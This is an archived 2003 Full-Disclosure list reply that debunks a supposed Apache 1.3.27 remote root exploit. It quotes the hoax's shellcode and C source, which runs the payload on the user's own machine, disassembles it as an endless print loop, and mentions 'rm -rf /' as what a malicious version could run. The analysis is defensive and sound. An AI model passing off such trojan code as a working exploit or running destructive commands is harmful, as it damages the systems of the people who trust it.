Full Disclosure mailing list archives
RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)
From: "mattmurphy () kc rr com" <mattmurphy () kc rr com>
Date: Fri, 20 Jun 2003 14:48:33 -0400
I am posting this as a member of koec. The koec take no responsibility for damages caused by this software, compile and use at your own risk. By the way, the koec make you all look like a bunch of fuckin' schoolgirls. WHITEH8.
Haha! That's really quite funny. We'll see in just a moment, why that disclaimer is necessary.
- --BEGIN KOEC-APACHE.C-- /* :: PRIVATE - DO NOT DISTRIBUTE :: * Apache/1.3.27 - Remote Root Exploit * Knights of the Eastern Calculus (info () koec org) */
Is anybody else laughing about the "DO NOT DISTRIBUTE" banner in the publicly released code? Deja vu of the "ElectronicSouls" hoax.
static char shellcode[] = { "\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21" "\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68" "\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d" "\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00" "\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02" "\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d" "\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67" "\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00" "\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc" "\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50" "\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1" "\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24" "\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44" "\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89" "\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0" };
Let's analyze this payload: 31 DB xorl %ebx, %ebx C0 xorl %eax, %eax 31 D2 xorl %edx, %edx B2 18 movb %dl,$0x18 68 20 3F 21 0A pushl $0x0A213F20 68 54 52 31 58 pushl $0x58315254 68 65 20 4D 34 pushl $0x344D2065 68 73 20 54 68 pushl $0x68542073 68 61 74 20 69 pushl $0x69207461 68 2D 2D 57 68 pushl $0x68572D2D 89 E1 movl %ecx, %esp B0 04 movb %al, $0x04 CD 80 int $0x80 sys_write(stdin, "--What is The M4TR1X ?!\n", 24); B8 02 00 00 00 movl %eax, $0x00000002 CD 80 int $0x80 sys_write(stderr, "--What is The M4TR1X ?!\n", 24); EB F7 jmp +2 As you can see, the only relevant bytes of the code are the first 52. The code below it fails to work, so simply replacing the "\xeb\xf7" with "\x90\x90" will cause the exploit to crash the target with a SIGSEGV. Let's look at this memory allocation routine -- how funny. [snip] buffer = (char *) malloc(512 + 1024 + 100); if (buffer == NULL) { printf("Not enough memory\n"); exit(1); } memcpy(&buffer[512 - strlen(shellcode)], shellcode, strlen(shellcode)); buffer[512 + 1024] = ';'; buffer[512 + 1024 + 1] = '\0'; void(*b)()=(void*)shellcode;b(); [huge snip] It malloc's things oddly -- 512+1024+100 -- appearantly, our exploit authors couldn't do basic addition. 512+1024+100 = 1636. What's funnier, is that the shellcode is placed into the middle of the buffer, so if the shellcode ever gets sent, memory data is leaked to the target. Secondly is of course the fact that the shellcode is launched by the last line here. It is an infinitively looped payload that prints out "--What is The M4TR1X ?!" until the program is killed by a CTRL+C or a 'kill' command from another console. I'd like to add that "koec () hushmail com" is in violation of the list charter, namely the section that states the following: "Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient." While the code being distributed was not technically an "attachment", it was malicious to the recipient, as it was designed to waste CPU cycles on an infinite loop, and served no other purpose. I'd also like to add that list readers really should pay attention to the section of the charter that states: "Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list." Had KOEC intended to cause serious damage, that shellcode could have been written to execute: rm -rf / it is advised that users at least drop the privileges of suspect code with 'su' -- never run suspect files as highly-privileged users. -------------------------------------------------------------------- mail2web - Check your email from the web at http://mail2web.com/ . _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) koec (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Michael (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Eric Chien (Jun 20)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) gml (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) David M. Wilson (Jun 23)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) gml (Jun 20)
- Re: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Gareth Bromley (Jun 20)
- <Possible follow-ups>
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Hudak, Tyler (Jun 20)
- RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) mattmurphy () kc rr com (Jun 20)
- Re: RE: Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) Christian Friedl (Jun 21)